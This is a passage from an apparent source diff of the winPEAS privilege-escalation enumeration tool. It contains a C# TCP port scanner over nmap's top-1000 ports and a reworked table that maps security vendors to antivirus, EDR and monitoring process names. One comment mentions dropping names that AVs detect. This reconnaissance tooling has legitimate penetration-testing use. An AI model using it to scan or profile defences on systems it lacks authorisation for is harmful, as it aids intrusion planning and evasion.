5054,5060,5061,5080,5087,5100,5101,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405,5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,
5633,5666,5678,5679,5718,5730,5800,5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911,5915,5922,5925,5950,5952,5959,
5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502,6510,6543,6547,
6565,6566,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792,6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,
7402,7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000,8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,
8082,8083,8084,8085,8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291,8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,
8652,8654,8701,8800,8873,8888,8899,8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102,9103,9110,9111,9200,9207,9220,9290,
9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595,9618,9666,9876,9877,9878,9898,9900,9917,9929,9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,
10012,10024,10025,10082,10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174,12265,12345,13456,13722,13782,13783,14000,14238,
14441,14442,15000,15002,15003,15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101,18988,19101,19283,19315,19350,19780,19801,
19842,20000,20005,20031,20221,20222,20828,21571,22939,23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951,31038,31337,32768,
32769,32770,32771,32772,32773,32774,32775,32776,32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292,40193,40911,41511,42510,
44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157,49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002,50003,50006,
50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328,55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,
64623,64680,65000,65129,65389
};
#endregion
private struct TcpPortState
{
public TcpClient MainClient { get; set; }
public bool IsTcpPortOpen { get; set; }
}
IEnumerable<int> portsToScan = nmapTop1000TCPPorts;
public PortScanner(IEnumerable<int> ports)
{
if (ports != null)
{
portsToScan = ports;
}
}
public void Start(string host)
{
Parallel.ForEach(portsToScan, port =>
{
RunScanTcp(host, port);
});
}
public void RunScanTcp(string host, int port)
{
Thread.Sleep(1);
var newClient = new TcpClient();
var state = new TcpPortState
{
MainClient = newClient,
IsTcpPortOpen = true
};
IAsyncResult ar = newClient.BeginConnect(host, port, AsyncCallback, state);
state.IsTcpPortOpen = ar.AsyncWaitHandle.WaitOne(TcpTimeout, false);
if (state.IsTcpPortOpen == false || newClient.Connected == false)
{
return;
}
Console.WriteLine("[+] Open TCP port at: {0}:{1}", host, port);
}
void AsyncCallback(IAsyncResult asyncResult)
{
var state = (TcpPortState)asyncResult.AsyncState;
TcpClient client = state.MainClient;
try
{
client.EndConnect(asyncResult);
}
catch
{
return;
}
if (client.Connected && state.IsTcpPortOpen)
{
return;
}
client.Close();
}
}
}

751
winPEAS/winPEASexe/winPEAS/Info/ProcessInfo/DefensiveProcesses.cs
View File

@@ -4,664 +4,103 @@ namespace winPEAS.Info.ProcessInfo
{
static class DefensiveProcesses
{
public static Dictionary<string, string> Definitions = new Dictionary<string, string>()
private static Dictionary<string, HashSet<string>> Definitions = new Dictionary<string, HashSet<string>>()
{
{"mcshield.exe" , "McAfee AV"},
{"windefend.exe" , "Windows Defender AV"},
{"MSASCui.exe" , "Windows Defender AV"},
{"MSASCuiL.exe" , "Windows Defender AV"},
{"msmpeng.exe" , "Windows Defender AV"},
{"msmpsvc.exe" , "Windows Defender AV"},
{"WRSA.exe" , "WebRoot AV"},
{"savservice.exe" , "Sophos AV"},
{"TMCCSF.exe" , "Trend Micro AV"},
{"symantec antivirus.exe" , "Symantec AV"},
{"mbae.exe" , "MalwareBytes Anti-Exploit"},
{"parity.exe" , "Bit9 application whitelisting"},
{"cb.exe" , "Carbon Black behavioral analysis"},
{"bds-vision.exe" , "BDS Vision behavioral analysis"},
{"Triumfant.exe" , "Triumfant behavioral analysis"},
{"CSFalcon.exe" , "CrowdStrike Falcon EDR"},
{"ossec.exe" , "OSSEC intrusion detection"},
{"TmPfw.exe" , "Trend Micro firewall"},
{"dgagent.exe" , "Verdasys Digital Guardian DLP"},
{"kvoop.exe" , " DLP process" },
{"AAWTray.exe" , ""},
{"ackwin32.exe" , ""},
{"Ad-Aware.exe" , ""},
{"adaware.exe" , ""},
{"advxdwin.exe" , ""},
{"agentsvr.exe" , ""},
{"agentw.exe" , ""},
{"alertsvc.exe" , ""},
{"alevir.exe" , ""},
{"alogserv.exe" , ""},
{"amon9x.exe" , ""},
{"anti-trojan.exe" , ""},
{"antivirus.exe" , ""},
{"ants.exe" , ""},
{"apimonitor.exe" , ""},
{"aplica32.exe" , ""},
{"apvxdwin.exe" , ""},
{"arr.exe" , ""},
{"atcon.exe" , ""},
{"atguard.exe" , ""},
{"atro55en.exe" , ""},
{"atupdater.exe" , ""},
{"atwatch.exe" , ""},
{"au.exe" , ""},
{"aupdate.exe" , ""},
{"auto-protect.nav80try.exe", ""},
{"autodown.exe" , ""},
{"autoruns.exe" , ""},
{"autorunsc.exe" , ""},
{"autotrace.exe" , ""},
{"autoupdate.exe" , ""},
{"avconsol.exe" , ""},
{"ave32.exe" , ""},
{"avgcc32.exe" , ""},
{"avgctrl.exe" , ""},
{"avgemc.exe" , ""},
{"avgnt.exe" , ""},
{"avgrsx.exe" , ""},
{"avgserv.exe" , ""},
{"avgserv9.exe" , ""},
{"avguard.exe" , ""},
{"avgwdsvc.exe" , ""},
{"avgui.exe" , ""},
{"avgw.exe" , ""},
{"avkpop.exe" , ""},
{"avkserv.exe" , ""},
{"avkservice.exe" , ""},
{"avkwctl9.exe" , ""},
{"avltmain.exe" , ""},
{"avnt.exe" , ""},
{"avp.exe" , ""},
{"avp32.exe" , ""},
{"avpcc.exe" , ""},
{"avpdos32.exe" , ""},
{"avpm.exe" , ""},
{"avptc32.exe" , ""},
{"avpupd.exe" , ""},
{"avsched32.exe" , ""},
{"avsynmgr.exe" , ""},
{"avwin.exe" , ""},
{"avwin95.exe" , ""},
{"avwinnt.exe" , ""},
{"avwupd.exe" , ""},
{"avwupd32.exe" , ""},
{"avwupsrv.exe" , ""},
{"avxmonitor9x.exe" , ""},
{"avxmonitornt.exe" , ""},
{"avxquar.exe" , ""},
{"backweb.exe" , ""},
{"bargains.exe" , ""},
{"bd_professional.exe" , ""},
{"beagle.exe" , ""},
{"belt.exe" , ""},
{"bidef.exe" , ""},
{"bidserver.exe" , ""},
{"bipcp.exe" , ""},
{"bipcpevalsetup.exe" , ""},
{"bisp.exe" , ""},
{"blackd.exe" , ""},
{"blackice.exe" , ""},
{"blink.exe" , ""},
{"blss.exe" , ""},
{"bootconf.exe" , ""},
{"bootwarn.exe" , ""},
{"borg2.exe" , ""},
{"bpc.exe" , ""},
{"brasil.exe" , ""},
{"bs120.exe" , ""},
{"bundle.exe" , ""},
{"bvt.exe" , ""},
{"ccapp.exe" , ""},
{"ccevtmgr.exe" , ""},
{"ccpxysvc.exe" , ""},
{"ccSvcHst.exe" , ""},
{"cdp.exe" , ""},
{"cfd.exe" , ""},
{"cfgwiz.exe" , ""},
{"cfiadmin.exe" , ""},
{"cfiaudit.exe" , ""},
{"cfinet.exe" , ""},
{"cfinet32.exe" , ""},
{"claw95.exe" , ""},
{"claw95cf.exe" , ""},
{"clean.exe" , ""},
{"cleaner.exe" , ""},
{"cleaner3.exe" , ""},
{"cleanpc.exe" , ""},
{"cleanup.exe" , ""},
{"click.exe" , ""},
{"cmdagent.exe" , ""},
{"cmesys.exe" , ""},
{"cmgrdian.exe" , ""},
{"cmon016.exe" , ""},
{"connectionmonitor.exe" , ""},
{"cpd.exe" , ""},
{"cpf9x206.exe" , ""},
{"cpfnt206.exe" , ""},
{"ctrl.exe" , ""},
{"cv.exe" , ""},
{"cwnb181.exe" , ""},
{"cwntdwmo.exe" , ""},
{"CylanceUI.exe" , ""},
{"CyProtect.exe" , ""},
{"CyUpdate.exe" , ""},
{"cyserver.exe" , ""},
{"cytray.exe" , ""},
{"CyveraService.exe" , ""},
{"datemanager.exe" , ""},
{"dcomx.exe" , ""},
{"defalert.exe" , ""},
{"defscangui.exe" , ""},
{"defwatch.exe" , ""},
{"deputy.exe" , ""},
{"divx.exe" , ""},
{"dgprompt.exe" , ""},
{"DgService.exe" , ""},
{"dllcache.exe" , ""},
{"dllreg.exe" , ""},
{"doors.exe" , ""},
{"dpf.exe" , ""},
{"dpfsetup.exe" , ""},
{"dpps2.exe" , ""},
{"drwatson.exe" , ""},
{"drweb32.exe" , ""},
{"drwebupw.exe" , ""},
{"dssagent.exe" , ""},
{"dumpcap.exe" , ""},
{"dvp95.exe" , ""},
{"dvp95_0.exe" , ""},
{"ecengine.exe" , ""},
{"efpeadm.exe" , ""},
{"egui.exe" , ""},
{"ekrn.exe" , ""},
{"emet_agent.exe" , ""},
{"emet_service.exe" , ""},
{"emsw.exe" , ""},
{"engineserver.exe" , ""},
{"ent.exe" , ""},
{"esafe.exe" , ""},
{"escanhnt.exe" , ""},
{"escanv95.exe" , ""},
{"espwatch.exe" , ""},
{"ethereal.exe" , ""},
{"etrustcipe.exe" , ""},
{"evpn.exe" , ""},
{"exantivirus-cnet.exe" , ""},
{"exe.avxw.exe" , ""},
{"expert.exe" , ""},
{"explore.exe" , ""},
{"f-agnt95.exe" , ""},
{"f-prot.exe" , ""},
{"f-prot95.exe" , ""},
{"f-stopw.exe" , ""},
{"fameh32.exe" , ""},
{"fast.exe" , ""},
{"fch32.exe" , ""},
{"fcagswd.exe" , "McAfee DLP Agent"},
{"fcags.exe" , "McAfee DLP Agent"},
{"fih32.exe" , ""},
{"findviru.exe" , ""},
{"firesvc.exe" , "McAfee Host Intrusion Prevention"},
{"firetray.exe" , ""},
{"firewall.exe" , ""},
{"fnrb32.exe" , ""},
{"fp-win.exe" , ""},
{"fp-win_trial.exe" , ""},
{"fprot.exe" , ""},
{"frameworkservice.exe" , ""},
{"frminst.exe" , ""},
{"frw.exe" , ""},
{"fsaa.exe" , ""},
{"fsav.exe" , ""},
{"fsav32.exe" , ""},
{"fsav530stbyb.exe" , ""},
{"fsav530wtbyb.exe" , ""},
{"fsav95.exe" , ""},
{"fsgk32.exe" , ""},
{"fsm32.exe" , ""},
{"fsma32.exe" , ""},
{"fsmb32.exe" , ""},
{"gator.exe" , ""},
{"gbmenu.exe" , ""},
{"gbpoll.exe" , ""},
{"generics.exe" , ""},
{"gmt.exe" , ""},
{"guard.exe" , ""},
{"guarddog.exe" , ""},
{"hacktracersetup.exe" , ""},
{"hbinst.exe" , ""},
{"hbsrv.exe" , ""},
{"HijackThis.exe" , ""},
{"hipsvc.exe" , ""},
{"HipMgmt.exe" , "McAfee Host Intrusion Protection"},
{"hotactio.exe" , ""},
{"hotpatch.exe" , ""},
{"htlog.exe" , ""},
{"htpatch.exe" , ""},
{"hwpe.exe" , ""},
{"hxdl.exe" , ""},
{"hxiul.exe" , ""},
{"iamapp.exe" , ""},
{"iamserv.exe" , ""},
{"iamstats.exe" , ""},
{"ibmasn.exe" , ""},
{"ibmavsp.exe" , ""},
{"icload95.exe" , ""},
{"icloadnt.exe" , ""},
{"icmon.exe" , ""},
{"icsupp95.exe" , ""},
{"icsuppnt.exe" , ""},
{"idle.exe" , ""},
{"iedll.exe" , ""},
{"iedriver.exe" , ""},
{"iface.exe" , ""},
{"ifw2000.exe" , ""},
{"inetlnfo.exe" , ""},
{"infus.exe" , ""},
{"infwin.exe" , ""},
{"init.exe" , ""},
{"intdel.exe" , ""},
{"intren.exe" , ""},
{"iomon98.exe" , ""},
{"istsvc.exe" , ""},
{"jammer.exe" , ""},
{"jdbgmrg.exe" , ""},
{"jedi.exe" , ""},
{"kavlite40eng.exe" , ""},
{"kavpers40eng.exe" , ""},
{"kavpf.exe" , ""},
{"kazza.exe" , ""},
{"keenvalue.exe" , ""},
{"kerio-pf-213-en-win.exe" , ""},
{"kerio-wrl-421-en-win.exe" , ""},
{"kerio-wrp-421-en-win.exe" , ""},
{"kernel32.exe" , ""},
{"KeyPass.exe" , ""},
{"killprocesssetup161.exe" , ""},
{"launcher.exe" , ""},
{"ldnetmon.exe" , ""},
{"ldpro.exe" , ""},
{"ldpromenu.exe" , ""},
{"ldscan.exe" , ""},
{"lnetinfo.exe" , ""},
{"loader.exe" , ""},
{"localnet.exe" , ""},
{"lockdown.exe" , ""},
{"lockdown2000.exe" , ""},
{"lookout.exe" , ""},
{"lordpe.exe" , ""},
{"lsetup.exe" , ""},
{"luall.exe" , ""},
{"luau.exe" , ""},
{"lucomserver.exe" , ""},
{"luinit.exe" , ""},
{"luspt.exe" , ""},
{"mapisvc32.exe" , ""},
{"masvc.exe" , "McAfee Agent"},
{"mbamservice.exe" , ""},
{"mcafeefire.exe" , ""},
{"mcagent.exe" , ""},
{"mcmnhdlr.exe" , ""},
{"mcscript.exe" , ""},
{"mcscript_inuse.exe" , ""},
{"mctool.exe" , ""},
{"mctray.exe" , ""},
{"mcupdate.exe" , ""},
{"mcvsrte.exe" , ""},
{"mcvsshld.exe" , ""},
{"md.exe" , ""},
{"mfeann.exe" , "McAfee VirusScan Enterprise"},
{"mfemactl.exe" , "McAfee VirusScan Enterprise"},
{"mfevtps.exe" , ""},
{"mfin32.exe" , ""},
{"mfw2en.exe" , ""},
{"mfweng3.02d30.exe" , ""},
{"mgavrtcl.exe" , ""},
{"mgavrte.exe" , ""},
{"mghtml.exe" , ""},
{"mgui.exe" , ""},
{"minilog.exe" , ""},
{"minionhost.exe" , ""},
{"mmod.exe" , ""},
{"monitor.exe" , ""},
{"moolive.exe" , ""},
{"mostat.exe" , ""},
{"mpfagent.exe" , ""},
{"mpfservice.exe" , ""},
{"mpftray.exe" , ""},
{"mrflux.exe" , ""},
{"msapp.exe" , ""},
{"msbb.exe" , ""},
{"msblast.exe" , ""},
{"mscache.exe" , ""},
{"msccn32.exe" , ""},
{"mscman.exe" , ""},
{"msconfig.exe" , ""},
{"msdm.exe" , ""},
{"msdos.exe" , ""},
{"msiexec16.exe" , ""},
{"msinfo32.exe" , ""},
{"mslaugh.exe" , ""},
{"msmgt.exe" , ""},
{"msmsgri32.exe" , ""},
{"MsSense.exe" , "Microsoft Defender ATP"},
{"mssmmc32.exe" , ""},
{"mssys.exe" , ""},
{"msvxd.exe" , ""},
{"mu0311ad.exe" , ""},
{"mwatch.exe" , ""},
{"n32scanw.exe" , ""},
{"naprdmgr.exe" , ""},
{"nav.exe" , ""},
{"navap.navapsvc.exe" , ""},
{"navapsvc.exe" , ""},
{"navapw32.exe" , ""},
{"navdx.exe" , ""},
{"navlu32.exe" , ""},
{"navnt.exe" , ""},
{"navstub.exe" , ""},
{"navw32.exe" , ""},
{"navwnt.exe" , ""},
{"nc2000.exe" , ""},
{"ncinst4.exe" , ""},
{"ndd32.exe" , ""},
{"neomonitor.exe" , ""},
{"neowatchlog.exe" , ""},
{"netarmor.exe" , ""},
{"netd32.exe" , ""},
{"netinfo.exe" , ""},
{"netmon.exe" , ""},
{"netscanpro.exe" , ""},
{"netspyhunter-1.2.exe" , ""},
{"netstat.exe" , ""},
{"netutils.exe" , ""},
{"nisserv.exe" , ""},
{"nisum.exe" , ""},
{"nmain.exe" , ""},
{"nod32.exe" , ""},
{"normist.exe" , ""},
{"norton_internet_secu_3.0_407.exe" , ""},
{"notstart.exe" , ""},
{"npf40_tw_98_nt_me_2k.exe" , ""},
{"npfmessenger.exe" , ""},
{"nprotect.exe" , ""},
{"npscheck.exe" , ""},
{"npssvc.exe" , ""},
{"nsched32.exe" , ""},
{"nssys32.exe" , ""},
{"nstask32.exe" , ""},
{"nsupdate.exe" , ""},
{"nt.exe" , ""},
{"ntrtscan.exe" , ""},
{"ntvdm.exe" , ""},
{"ntxconfig.exe" , ""},
{"nui.exe" , ""},
{"nupgrade.exe" , ""},
{"nvarch16.exe" , ""},
{"nvc95.exe" , ""},
{"nvsvc32.exe" , ""},
{"nwinst4.exe" , ""},
{"nwservice.exe" , ""},
{"nwtool16.exe" , ""},
{"nxlog.exe" , ""},
{"ollydbg.exe" , ""},
{"onsrvr.exe" , ""},
{"optimize.exe" , ""},
{"ostronet.exe" , ""},
{"osqueryd.exe" , ""},
{"otfix.exe" , ""},
{"outpost.exe" , ""},
{"outpostinstall.exe" , ""},
{"outpostproinstall.exe" , ""},
{"padmin.exe" , ""},
{"panixk.exe" , ""},
{"patch.exe" , ""},
{"pavcl.exe" , ""},
{"pavproxy.exe" , ""},
{"pavsched.exe" , ""},
{"pavw.exe" , ""},
{"pccwin98.exe" , ""},
{"pcfwallicon.exe" , ""},
{"pcip10117_0.exe" , ""},
{"pcscan.exe" , ""},
{"pdsetup.exe" , ""},
{"periscope.exe" , ""},
{"persfw.exe" , ""},
{"perswf.exe" , ""},
{"pf2.exe" , ""},
{"pfwadmin.exe" , ""},
{"pgmonitr.exe" , ""},
{"pingscan.exe" , ""},
{"platin.exe" , ""},
{"pop3trap.exe" , ""},
{"poproxy.exe" , ""},
{"popscan.exe" , ""},
{"portdetective.exe" , ""},
{"portmonitor.exe" , ""},
{"powerscan.exe" , ""},
{"ppinupdt.exe" , ""},
{"pptbc.exe" , ""},
{"ppvstop.exe" , ""},
{"prizesurfer.exe" , ""},
{"prmt.exe" , ""},
{"prmvr.exe" , ""},
{"procdump.exe" , ""},
{"processmonitor.exe" , ""},
{"procexp.exe" , ""},
{"procexp64.exe" , ""},
{"procexplorerv1.0.exe" , ""},
{"procmon.exe" , ""},
{"programauditor.exe" , ""},
{"proport.exe" , ""},
{"protectx.exe" , ""},
{"pspf.exe" , ""},
{"purge.exe" , ""},
{"qconsole.exe" , ""},
{"qserver.exe" , ""},
{"rapapp.exe" , ""},
{"rav7.exe" , ""},
{"rav7win.exe" , ""},
{"rav8win32eng.exe" , ""},
{"ray.exe" , ""},
{"rb32.exe" , ""},
{"rcsync.exe" , ""},
{"realmon.exe" , ""},
{"reged.exe" , ""},
{"regedit.exe" , ""},
{"regedt32.exe" , ""},
{"rescue.exe" , ""},
{"rescue32.exe" , ""},
{"rrguard.exe" , ""},
{"rtvscan.exe" , ""},
{"rtvscn95.exe" , ""},
{"rulaunch.exe" , ""},
{"run32dll.exe" , ""},
{"rundll.exe" , ""},
{"rundll16.exe" , ""},
{"ruxdll32.exe" , ""},
{"safeweb.exe" , ""},
{"sahagent.exescan32.exe" , ""},
{"save.exe" , ""},
{"savenow.exe" , ""},
{"sbserv.exe" , ""},
{"scam32.exe" , ""},
{"scan32.exe" , ""},
{"scan95.exe" , ""},
{"scanpm.exe" , ""},
{"scrscan.exe" , ""},
{"SentinelOne.exe" , ""},
{"serv95.exe" , ""},
{"setupvameeval.exe" , ""},
{"setup_flowprotector_us.exe", ""},
{"sfc.exe" , ""},
{"sgssfw32.exe" , ""},
{"sh.exe" , ""},
{"shellspyinstall.exe" , ""},
{"shn.exe" , ""},
{"showbehind.exe" , ""},
{"shstat.exe" , "McAfee VirusScan Enterprise"},
{"SISIDSService.exe" , ""},
{"SISIPSUtil.exe" , ""},
{"smc.exe" , ""},
{"sms.exe" , ""},
{"smss32.exe" , ""},
{"soap.exe" , ""},
{"sofi.exe" , ""},
{"sperm.exe" , ""},
{"splunk.exe" , "Splunk"},
{"splunkd.exe" , "Splunk"},
{"splunk-admon.exe" , "Splunk"},
{"splunk-powershell.exe" , "Splunk"},
{"splunk-winevtlog.exe" , "Splunk"},
{"spf.exe" , ""},
{"sphinx.exe" , ""},
{"spoler.exe" , ""},
{"spoolcv.exe" , ""},
{"spoolsv32.exe" , ""},
{"spyxx.exe" , ""},
{"srexe.exe" , ""},
{"srng.exe" , ""},
{"ss3edit.exe" , ""},
{"ssgrate.exe" , ""},
{"ssg_4104.exe" , ""},
{"st2.exe" , ""},
{"start.exe" , ""},
{"stcloader.exe" , ""},
{"supftrl.exe" , ""},
{"support.exe" , ""},
{"supporter5.exe" , ""},
{"svchostc.exe" , ""},
{"svchosts.exe" , ""},
{"sweep95.exe" , ""},
{"sweepnet.sweepsrv.sys.swnetsup.exe", ""},
{"symproxysvc.exe" , ""},
{"symtray.exe" , ""},
{"sysedit.exe" , ""},
{"sysmon.exe" , "Sysinternals Sysmon"},
{"sysupd.exe" , ""},
{"TaniumClient.exe" , "Tanium"},
{"taskmg.exe" , ""},
{"taskmo.exe" , ""},
{"taumon.exe" , ""},
{"tbmon.exe" , ""},
{"tbscan.exe" , ""},
{"tc.exe" , ""},
{"tca.exe" , ""},
{"tcm.exe" , ""},
{"tcpview.exe" , ""},
{"tds-3.exe" , ""},
{"tds2-98.exe" , ""},
{"tds2-nt.exe" , ""},
{"teekids.exe" , ""},
{"tfak.exe" , ""},
{"tfak5.exe" , ""},
{"tgbob.exe" , ""},
{"titanin.exe" , ""},
{"titaninxp.exe" , ""},
{"tlaservice.exe" , ""},
{"tlaworker.exe" , ""},
{"tracert.exe" , ""},
{"trickler.exe" , ""},
{"trjscan.exe" , ""},
{"trjsetup.exe" , ""},
{"trojantrap3.exe" , ""},
{"tsadbot.exe" , ""},
{"tshark.exe" , ""},
{"tvmd.exe" , ""},
{"tvtmd.exe" , ""},
{"udaterui.exe" , ""},
{"undoboot.exe" , ""},
{"updat.exe" , ""},
{"update.exe" , ""},
{"updaterui.exe" , ""},
{"upgrad.exe" , ""},
{"utpost.exe" , ""},
{"vbcmserv.exe" , ""},
{"vbcons.exe" , ""},
{"vbust.exe" , ""},
{"vbwin9x.exe" , ""},
{"vbwinntw.exe" , ""},
{"vcsetup.exe" , ""},
{"vet32.exe" , ""},
{"vet95.exe" , ""},
{"vettray.exe" , ""},
{"vfsetup.exe" , ""},
{"vir-help.exe" , ""},
{"virusmdpersonalfirewall.exe", ""},
{"vnlan300.exe" , ""},
{"vnpc3000.exe" , ""},
{"vpc32.exe" , ""},
{"vpc42.exe" , ""},
{"vpfw30s.exe" , ""},
{"vptray.exe" , ""},
{"vscan40.exe" , ""},
{"vscenu6.02d30.exe" , ""},
{"vsched.exe" , ""},
{"vsecomr.exe" , ""},
{"vshwin32.exe" , ""},
{"vsisetup.exe" , ""},
{"vsmain.exe" , ""},
{"vsmon.exe" , ""},
{"vsstat.exe" , ""},
{"vstskmgr.exe" , "McAfee VirusScan Enterprise"},
{"vswin9xe.exe" , ""},
{"vswinntse.exe" , ""},
{"vswinperse.exe" , ""},
{"w32dsm89.exe" , ""},
{"w9x.exe" , ""},
{"watchdog.exe" , ""},
{"webdav.exe" , ""},
{"webscanx.exe" , ""},
{"webtrap.exe" , ""},
{"wfindv32.exe" , ""},
{"whoswatchingme.exe" , ""},
{"wimmun32.exe" , ""},
{"win-bugsfix.exe" , ""},
{"win32.exe" , ""},
{"win32us.exe" , ""},
{"winactive.exe" , ""},
{"window.exe" , ""},
{"windows.exe" , ""},
{"wininetd.exe" , ""},
{"wininitx.exe" , ""},
{"winlogin.exe" , ""},
{"winmain.exe" , ""},
{"winnet.exe" , ""},
{"winppr32.exe" , ""},
{"winrecon.exe" , ""},
{"winservn.exe" , ""},
{"winssk32.exe" , ""},
{"winstart.exe" , ""},
{"winstart001.exe" , ""},
{"wintsk32.exe" , ""},
{"winupdate.exe" , ""},
{"wireshark.exe" , ""},
{"wkufind.exe" , ""},
{"wnad.exe" , ""},
{"wnt.exe" , ""},
{"wradmin.exe" , ""},
{"wrctrl.exe" , ""},
{"wsbgate.exe" , ""},
{"wupdater.exe" , ""},
{"wupdt.exe" , ""},
{"wyvernworksfirewall.exe" , ""},
{"xagt.exe" , ""},
{"xpf202en.exe" , ""},
{"zapro.exe" , ""},
{"zapsetup3001.exe" , ""},
{"zatutor.exe" , ""},
/*{"zonalm2601" , ""}, These names (ending in .exe) are detected by AVs
{"zonealarm" , ""},
{"_avp32" , ""},
{"_avpcc" , ""},
{"rshell" , ""},
{"_avpms" , ""}*/
{ "ALYac", new HashSet<string>() { "alyac.exe", "aylaunch.exe", "asmsetup.exe", } },
{ "AVG Antivirus", new HashSet<string>() { "avgui.exe", } },
{ "AVG", new HashSet<string>() { "avgemc.exe", "afwserv.exe", "avgsvc.exe", "aswidsagent.exe", } },
{ "Ad-Aware Total Security by Lavasoft", new HashSet<string>() { "ffcachetool.exe", "avktray.exe", "gdsc.exe", "bootcdwizard.exe", "avkservice.exe", "ask.exe", "avkwctlx64.exe", "gdfwadmin.exe", "avktuner.exe", "initinst.exe", "gdfwsvc.exe", "avk.exe", "avkwscpe.exe", "avkwctl.exe", "avktunerservice.exe", "mkisofs.exe", "gdfirewalltray.exe", "initinstx64.exe", "gdgadgetinst32.exe", "gdfwsvcx64.exe", "aawtray.exe", } },
{ "AhnLab-V3", new HashSet<string>() { "aup80if.ex", "v3ui.exe", "v3medic.exe", "v3lite.exe", "v3l4cli.exe", } },
{ "Antiy-AVL", new HashSet<string>() { "avl.exe", } },
{ "Arcabit", new HashSet<string>() { "arcavir.exe", "arcaconfsv.exe", "arcabit.core.loggingservice.exe", "arcabit.core.configurator2.exe", "arcabit.exe", } },
{ "Avast Antivirus", new HashSet<string>() { "avastui.exe", } },
{ "Avast", new HashSet<string>() { "avast-antivirus.exe", "avastsvc.exe", "ashserv.exe", } },
{ "Avira", new HashSet<string>() { "avira.webapphost.exe", } },
{ "Baidu", new HashSet<string>() { "bav.exe", "bavcloud.exe", "bavhm.exe", "bavsvc.exe", "bavtray.exe", "bavupdater.exe", "bavbsreport.exe", } },
{ "BitDefender", new HashSet<string>() { "epprotectedservice.exe", "epsecurityservice.exe", "epupdateservice.exe", "epupdateserver.exe", "bdagent.exe", } },
{ "Bkav Pro", new HashSet<string>() { "bkavutil.exe", "bkav.exe", "bkavpro.exe", "bkavservice.exe", } },
{ "CMC", new HashSet<string>() { "cmcpanel.exe", "cmccore.exe", "cmctrayicon.exe", } },
{ "Cisco", new HashSet<string>() { "sfc.exe", } },
{ "ClamAV", new HashSet<string>() { "clamscan.exe", "freshclam.exe", } },
{ "Comodo", new HashSet<string>() { "cavwp.exe", "cfp.exe", } },
{ "CrowdStrike Falcon", new HashSet<string>() { "falconsensorwinos.exe", } },
{ "Cybereason", new HashSet<string>() { "cybereasonransomfreeservicehost.exe", } },
{ "Cylance", new HashSet<string>() { "cylancesvc.exe", } },
{ "Cynet", new HashSet<string>() { "cynet.exe", "cexplore.exe", "cynet.zerologondetector.exe", } },
{ "Cyradar", new HashSet<string>() { "cyradarexecutorservices.exe", "cyradaredr.exe", "cyradares.exe", } },
{ "DrWeb", new HashSet<string>() { "dwscancl.exe", "drwebsettingprocess.exe", "dwsysinfo.exe", "drwupsrv.exe", "dwnetfilter.exe", "dwscanner.exe", "dwservice.exe", "frwl_notify.exe", "frwl_svc.exe", "spideragent.exe", "spideragent_adm.exe", } },
{ "ESET-NOD32", new HashSet<string>() { "eraagent.exe", "shouldiremoveit.com", "ecmd.exe", "egui.exe", } },
{ "F-Secure", new HashSet<string>() { "fsav32.exe", "fsdfwd.exe", "fsguiexe.exe", "fsav.exe", } },
{ "G Data AntiVirus", new HashSet<string>() { "bootcdwizard.exe", "avkservice.exe", "avktray.exe", "gdgadgetinst32.exe", "ransomwareremovalhelper.exe", "gdlog.exe", "sec.exe", "avkwctlx64.exe", "updategui.exe", "avk.exe", "autorundelayloader.exe", "avkcmd.exe", "avkwscpe.exe", "iupdateavk.exe", } },
{ "GridinSoft Anti-Malware", new HashSet<string>() { "uninst.exe", "gtkmgmtc.exe", "tkcon.exe", "unpacker.exe", } },
{ "IObit Malware Fighter 3", new HashSet<string>() { "imfantivirususb.exe", "actioncenterdownloader.exe", "adsremovalsetup.exe", "feedback.exe", "iobituninstal.exe", "sendbugreport.exe", "imf_iobitdel.exe", "imfantivirustips.exe", "promote.exe", "imfupdater.exe", "imf_actioncenterdownloader.exe", "imfregister.exe", "reprocess.exe", "imfsrv_iobitdel.exe", "liveupdate.exe", "xmaspromote.exe", "spsetup.exe", "imf_downconfig.exe", "uninstallpromote.exe", "bluebirdinit.exe", "imftips.exe", "locallang.exe", "imfinstaller.exe", "aupdate.exe", "startmenu.exe", "iwsimfxp.exe", "ppuninstaller.exe", "taskschedule.exe", "fixplugin.exe", "imfantivirusfix.exe", "imfbigupgrade.exe", "imftips_iobitdel.exe", "imfsrv.exe", "iobitcommunities.exe", "autoupdate.exe", "unins000.exe", "homepage.exe", } },
